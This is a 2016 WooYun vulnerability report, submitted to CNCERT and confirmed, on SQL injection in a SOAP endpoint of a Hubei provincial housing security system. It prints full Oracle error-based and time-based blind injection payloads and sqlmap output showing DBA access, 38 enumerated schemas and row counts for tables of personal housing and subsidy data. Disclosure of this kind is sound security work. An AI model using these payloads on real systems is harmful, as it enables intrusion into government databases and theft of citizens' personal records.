当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192182

漏洞标题:某省住房保障局某系统存在SOAP注入漏洞(DBA权限/涉及38个数据库/可泄露几百万的敏感信息)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-04-04 13:40

修复时间:2016-05-21 14:20

公开时间:2016-05-21 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-04: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

38个库,都是几十万的数据,合起来都有好几百几千万的数据量!~~~

详细说明:

湖北省住房保障管理信息系统
注入点:

**.**.**.**:6080/GISServices/GisServices.asmx (POST)
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/"
xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>湖北*</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>项目</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


tns:areaName处存在注入

sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/
envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.o
rg/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>????%' AND 3310=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(100)||CHR(107)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (3310=3310) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(101)||CHR(122)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>???</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/
envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.o
rg/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
<tns:areaName>????%' AND 3082=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(113)|
|CHR(86)||CHR(112),5) AND '%'='</tns:areaName>
<tns:xmlbName></tns:xmlbName>
<tns:jsjdName>???</tns:jsjdName>
<tns:year></tns:year>
</tns:GetAreaXMStats>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---
[18:29:26] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[18:29:26] [INFO] fetching current user
[18:29:26] [INFO] retrieved: HBZFBZTEST
current user: 'HBZFBZTEST'
[18:29:26] [INFO] fetching current database
[18:29:26] [INFO] resumed: HBZFBZTEST
[18:29:26] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'HBZFBZTEST'
[18:29:26] [INFO] testing if current user is DBA
current user is DBA: True
available databases [38]:
[*] CLGL
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HBBZF
[*] HBJZGCGLJ
[*] HBJZGCGLJWF
[*] HBKSPJ
[*] HBSBDYKS
[*] HBZFBZ
[*] HBZFBZNEW
[*] HBZFBZTEMP
[*] HBZFBZTEST
[*] HBZFBZTEST1
[*] HBZFBZWEB
[*] HQZXTEST
[*] HYHOUSE
[*] HYHOUSE1
[*] HYHOUSETEST
[*] LJCLC
[*] LJCLCTEST
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SDE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTF
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
Database: HBZFBZTEST
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| BTSF | 907119 | 补贴首付
| DXDCCYXX | 713395 | 底薪调查常用信息
| DXDCJBXX | 603055 | 底薪调查基本信息
| JTCYQKB | 550277 | 具体从业情况表
| SQJTCYXX | 530856 | 税前津贴常用信息
| ZFXX | 520950 | 住房信息
| DXDCZFXX | 470300 | 底薪调查住房信息
| JTJBQKB | 457022 |
| SQJTJBXX | 367516 |
| JTDAB | 363887 | 津贴档案簿
| LHJFB | 295583 |
| SQJTZFXX | 292178 |
| BZDXHTQY | 199284 |
| SQRFWGXB | 137414 |
| SHXX | 116147 |
| MATERIAL_DIR_TABLE | 113781 |
| JTCYXXBF | 102470 |
| NSSHXX | 93787 |
| MATERIAL_DIR_MXB_TABLE | 84565 |
| JTJBXXBF | 67809 |
| YHKZHGL | 59506 |
| JTZFXXBF | 58759 |
| WYFSJGL | 40107 |
| BTYF | 37604 |
| ZFBZDMB | 33676 |
| ZRDJSHAJB | 33375 |
| BTJLB | 28038 |
| NSSHAJB | 25649 |
| DFPSQRGXB | 23948 |
| FWZJSJ | 22329 |
| HTHISTORY | 20446 |
| HBAZXX | 19805 |
| ZLBTTCJL | 16045 |
| FZZJ | 14417 |
| GSXX | 14207 |
| SQRBTJE | 9138 |
| DTGCXX | 8811 |
| WYFSD | 8238 |
| NSGSXX | 7546 |
| BZDXTJYB | 6734 |
| BTSFJL | 6515 |
| XMXX | 4650 |
| YPZFYTTGL | 4466 |
| XMGHXX | 3888 |
| IMGTAB | 3568 |
| TESTJR | 3104 |
| SYS_USER | 3091 |
| HD | 2977 |
| SYS_ROLE_USER | 2643 |
| BZDXXYGL | 2636 |
| HZB | 2509 |
| SYS_ROLE_MENU | 2171 |
| XMJDRZXX | 1915 |
| LHZBXZ | 1776 |
| FILEDB | 1004 |
| LJCLC | 993 |
| XMDETAIL | 987 |
| LJCLCBF | 867 |
| XMXXHISTORY | 733 |
| LZFZLBTBZXZ | 725 |
| ZRDJGZXZ | 647 |
| DXDCZCXX | 618 |
| SQJTZCXX | 580 |
| SYS_MENU_CONTROL | 491 |
| SYS_RESOURCE | 462 |
| TB_SYS_CITY | 384 |
| ZRDJGZZB | 260 |
| XMSTATS | 187 |
| AJGCNDJSJH | 162 |
| SYS_FOLDER | 161 |
| LZFZLBTBZ | 151 |
| LHZBLB | 147 |
| SYS_MENU | 135 |
| XMGHCQAZXX | 127 |
| LZFBTGS | 103 |
| SYS_ROLE_CONTROL | 91 |
| SYS_ROLE | 66 |
| XMNDJHXX | 52 |
| YPSFYTH | 41 |
| BZZJZCYSXX | 40 |
| BZZJZCXX | 34 |
| TB_SYS_CAPITAL | 34 |
| KGJGSTATS | 33 |
| JTZCXXBF | 31 |
| TSCL | 26 |
| TB_SYS_SYSFILES | 23 |
| WYGSXX | 20 |
| AJGCCITY | 17 |
| DSZPOINT | 17 |
| SJTJ | 17 |
| XMJSSPDZDA | 16 |
| BZZJJSXX | 12 |
| BZHSGHZB | 8 |
| NDJHJSXMCB | 8 |
| MATERIAL_MUST_TABLE | 7 |
| TB_SYS_PARAMCENTER | 7 |
| BSCYJB | 6 |
| TB_SYS_SYSMENU | 6 |
| XMCQAZHTBA | 6 |
| ZFBZGHHGZB | 6 |
| ZFJSGH | 6 |
| FZBZ | 5 |
| XMJSSPZYZJXX | 5 |
| TB_SYS_ROLE | 4 |
| ZRDJGZ | 4 |
| BZZJBF | 3 |
| DWSJFXX | 3 |
| TB_SYS_ADMIN | 3 |
| TB_SYS_DISTRIBUTION | 3 |
| XMNDJHCQAZXX | 3 |
| XMXX_PHQCQ | 3 |
| ZFBZNDJHZB | 3 |
| DCZBK | 2 |
| JSXMAJXXB | 2 |
| KHPJFAB | 2 |
| SCYJB | 2 |
| SXX | 2 |
| WWSBXXB | 2 |
| XMCYRYXX | 2 |
| ZFNDJSJH | 2 |
| ZXJC | 2 |
| ZYSJBZZJFPXX | 2 |
| BBDY | 1 |
| BZBZ | 1 |
| BZHTMB | 1 |
| GIS_MUTUALSTATE | 1 |
| KHPJZBB | 1 |
| TB_SYS_USERINFO | 1 |
| XMJSGCSGHTBAXX | 1 |
+------------------------+---------+


几百万的信息,就不继续跟进这些敏感信息了!~~~

201.jpg


202.jpg

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-06 14:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.

最新状态:

暂无